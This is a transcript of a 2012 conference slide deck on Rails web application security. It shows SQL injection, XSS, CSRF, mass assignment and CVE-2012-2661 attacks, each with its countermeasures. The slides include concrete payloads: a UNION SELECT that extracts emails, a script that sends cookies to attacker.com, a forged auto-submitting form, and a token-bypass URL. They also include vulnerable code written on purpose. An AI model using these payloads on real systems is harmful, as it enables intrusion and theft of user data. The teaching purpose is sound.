web application security in rails
DESCRIPTION
Talk I gave in RailsIsrael 2012 conferenceTRANSCRIPT
![Page 1: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/1.jpg)
WEB APPLICATION SECURITY IN RAILS
Uri Nativ RailsIsrael 2012
![Page 2: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/2.jpg)
Uri Nativ @unativ
Head of Engineering
Klarna Tel Aviv
#railsisrael
![Page 3: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/3.jpg)
Buy Now, Pay Later
1. Shop online 2. Receive your goods 3. Pay
![Page 4: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/4.jpg)
Alice
![Page 5: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/5.jpg)
Bob
![Page 6: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/6.jpg)
Alice and Bob
![Page 7: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/7.jpg)
Alice and Bob
![Page 8: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/8.jpg)
Alice and Bob
Like Duh?
![Page 9: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/9.jpg)
Alice and Bob
<html> <title> MicroBlogging </title> ...
#$@# %#@&*#$
![Page 10: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/10.jpg)
Alice and Bob
Hack it!
![Page 11: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/11.jpg)
SQL INJECTION
![Page 12: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/12.jpg)
@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all
SELECT 'microposts'.*
FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’)
SQL Injection
![Page 13: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/13.jpg)
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%')
SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
![Page 14: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/14.jpg)
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
![Page 15: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/15.jpg)
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
![Page 16: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/16.jpg)
@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all
SQL Injection - countermeasures
![Page 17: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/17.jpg)
CROSS SITE SCRIPTING
XSS
![Page 18: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/18.jpg)
<span class="content"> <%= raw feed_item.content %>
</span>
XSS
![Page 19: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/19.jpg)
<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
XSS
![Page 20: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/20.jpg)
<span class="content"> <%= sanitize feed_item.content,
:tags => ['a’] %>
</span>
XSS - countermeasures
![Page 21: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/21.jpg)
The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well
Countermeasures:
Never trust data from the users Use Markdown (e.g. Redcarpet gem)
XSS
![Page 22: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/22.jpg)
CROSS SITE REQUEST FORGERY
CSRF
![Page 23: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/23.jpg)
www.blog.com
CSRF
1
![Page 24: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/24.jpg)
www.blog.com
2
Click here for free iPad
www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> …
<script> document.evilform.submit()
</script>
CSRF
![Page 25: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/25.jpg)
www.blog.com
www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> …
<script> document.evilform.submit()
</script>
CSRF
3
![Page 26: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/26.jpg)
www.blog.com
www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> …
<script> document.evilform.submit()
</script>
POST /blogpost Content=“Kick Me!”
CSRF
4
![Page 27: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/27.jpg)
<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“
/>
CSRF – Authenticity Token
![Page 28: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/28.jpg)
routes.rb match '/delete_post/:id',
to: 'microposts#destroy'
CSRF
![Page 29: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/29.jpg)
class ApplicationController < ActionController::Base
# commented to easily test forms # protect_from_forgery ... end
CSRF
![Page 30: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/30.jpg)
The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in
Countermeasures:
Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link
CSRF
![Page 31: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/31.jpg)
RAILS SPECIFIC ATTACKS
![Page 32: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/32.jpg)
MASS ASSIGNMENT
boo[gotcha!]
![Page 33: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/33.jpg)
def create @user = User.new(params[:user]) ... end
Mass Assignment
![Page 34: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/34.jpg)
def create @user = User.new(params[:user]) ... end
Mass Assignment
{ :name => “gotcha”, :admin => true }
![Page 35: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/35.jpg)
Blacklist class User < ActiveRecord::Base attr_protected :admin ... end
Mass Assignment - countermeasures
![Page 36: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/36.jpg)
Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ...
Mass Assignment - countermeasures
![Page 37: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/37.jpg)
Global Config (whitelist) config.active_record.
whitelist_attributes = true
Mass Assignment - countermeasures
![Page 38: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/38.jpg)
The Attack: Unprotected by default :(
Countermeasures:
Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem
Mass Assignment
![Page 39: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/39.jpg)
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
![Page 40: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/40.jpg)
User.where( :id => params[:user_id], :reset_token => params[:token]
) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1
CVE-2012-2661 SQL Injection
![Page 41: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/41.jpg)
/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
CVE-2012-2661 SQL Injection
![Page 42: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/42.jpg)
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures:
Upgrade to Rails 3.2.4 or higher
CVE-2012-2661 SQL Injection
![Page 43: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/43.jpg)
------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | -------------------------------------------------
Brakeman
![Page 44: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/44.jpg)
CONCLUSIONS
![Page 45: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/45.jpg)
Make Love not War
![Page 46: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/46.jpg)
Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide
http://guides.rubyonrails.org/security.html
The Ruby on Rails security project
http://www.rorsecurity.info
Rails security mailing list:
http://groups.google.com/group/rubyonrails-security
Conclusions
![Page 47: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/47.jpg)
Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial
Thanks to…
![Page 48: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/48.jpg)
Pay Online – Safer and Simpler
https://github.com/unativ/sample_app